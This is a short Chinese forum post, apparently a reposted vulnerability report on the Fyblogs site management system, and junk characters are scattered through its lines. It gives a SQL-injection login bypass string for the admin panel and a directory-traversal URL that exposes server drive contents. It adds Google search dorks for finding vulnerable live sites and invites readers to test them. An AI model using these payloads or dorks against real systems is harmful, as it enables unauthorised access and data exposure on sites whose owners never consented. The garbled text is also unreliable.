漏洞类型: 未授权访问/权限绕过; k3 {# b4 S: {
4 R9 ?7 Q0 C4 d* P( W6 N, X, F- `3 k
简要描述:
+ N k: _; f1 O
g- G ]& K& F: h- y$ ^Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 b. l' A. G8 \9 a, K) \0 ^
7 ?6 o0 Q6 K) \4 G& J6 M) g4 W
详细说明:9 d( e2 J4 V5 w2 H
% a2 G7 g2 E* B/ I; A \
后台万能密码 'or'='or'
/ Q0 h& W0 W4 c$ ^ |% J, q+ k后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
' `; \, t @ z. n0 z, x: fadmin/uploadfile.asp?currentFolder=/upfiles/../$ ~% Q% d1 @4 a8 j/ F
% m2 m6 p+ ?! O4 d# d
漏洞证明:
# \# Z k; S+ V' k! A* o: u* ], V3 c" f7 G9 D' W2 @1 W
谷歌:inurl:type.asp?id=1 新闻中心
4 x' P- S) Z5 n7 Z N& Q7 @或者 :inurl:download_ok.asp?9 M2 f, V$ [) W ~' t; o* a* F
: S9 S- M3 t; y9 G* Y- I! _可以测试7 W4 C3 P, q& t0 e0 h
: K& I. i- o9 V; e: d" [5 T1 E U- J( S7 a4 S! K
|
发表于 2013-3-7 13:07:46
收藏
支持
反对